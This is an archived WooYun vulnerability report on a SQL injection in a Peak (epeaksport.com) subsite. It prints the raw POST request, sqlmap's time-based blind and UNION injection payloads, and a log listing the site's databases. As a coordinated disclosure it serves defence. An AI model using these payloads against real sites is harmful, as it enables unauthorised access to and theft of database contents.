当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125980

漏洞标题:匹克某分站SQL注入漏洞二(16库)

相关厂商:epeaksport.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-07-10 18:34

修复时间:2015-08-27 09:46

公开时间:2015-08-27 09:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-10: 细节已通知厂商并且等待厂商处理中
2015-07-13: 厂商已经确认,细节仅向厂商公开
2015-07-23: 细节向核心白帽子及相关领域专家公开
2015-08-02: 细节向普通白帽子公开
2015-08-12: 细节向实习白帽子公开
2015-08-27: 细节向公众公开

简要描述:

天地本不仁 万物为刍狗
【HD】 以团队之名 以个人之荣耀 共建网络安全

详细说明:

POST 数据包:

POST /XP001-Shopping/dialogSales.html HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://team.epeaksport.com/
Cookie: PHPSESSID=i532srvsrtg0ml6ui0icdfegc4
Host: team.epeaksport.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
productCode=E42638H


参数 productCode 可注入

0.png


1.png


看了下权限

2.png


随便找了几个数据库 跑了下(epeak 这个数据库跑起来依然慢)

3.png


看了几个 也不知道有什么的库(好多数据量没跑出来)

4.png


5.png


6.png


数据量没跑出来 有点可惜

漏洞证明:

POST parameter 'productCode' is vulnerable. Do you want to keep testing the othe
rs (if any)? [y/N] n
sqlmap identified the following injection points with a total of 112 HTTP(s) req
uests:
---
Parameter: productCode (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: productCode=E42638H' AND (SELECT * FROM (SELECT(SLEEP(5)))kUqy) AND
'Uttm'='Uttm
Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: productCode=-8846' UNION ALL SELECT NULL,NULL,CONCAT(0x71716a7871,0
x53705a66686355414941,0x71707a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[18:16:23] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[18:16:23] [INFO] fetching database names
[18:16:23] [INFO] the SQL query used returns 17 entries
[18:16:23] [INFO] retrieved: information_schema
[18:16:23] [INFO] retrieved: epeak
[18:16:23] [INFO] retrieved: epeakanalyse
[18:16:23] [INFO] retrieved: epeakassist
[18:16:24] [INFO] retrieved: epeakmall
[18:16:24] [INFO] retrieved: epeakmall_e
[18:16:24] [INFO] retrieved: epeakmall_team
[18:16:24] [INFO] retrieved: epeakmall_xf
[18:16:24] [INFO] retrieved: epeakpdm
[18:16:24] [INFO] retrieved: epeakpdm_e
[18:16:25] [INFO] retrieved: epeakpdm_team
[18:16:25] [INFO] retrieved: epeakpdm_xf
[18:16:25] [INFO] retrieved: epeakuniform
[18:16:25] [INFO] retrieved: epeakvip
[18:16:25] [INFO] retrieved: mysql
[18:16:25] [INFO] retrieved: performance_schema
available databases [16]:
[*] epeak
[*] epeakanalyse
[*] epeakassist
[*] epeakmall
[*] epeakmall_e
[*] epeakmall_team
[*] epeakmall_xf
[*] epeakpdm
[*] epeakpdm_e
[*] epeakpdm_team
[*] epeakpdm_xf
[*] epeakuniform
[*] epeakvip
[*] information_schema
[*] mysql
[*] performance_schema
[18:16:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 9 times
[18:16:26] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\team.epeaksport.com'
[*] shutting down at 18:16:26

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-13 09:45

厂商回复:

谢谢

最新状态:

暂无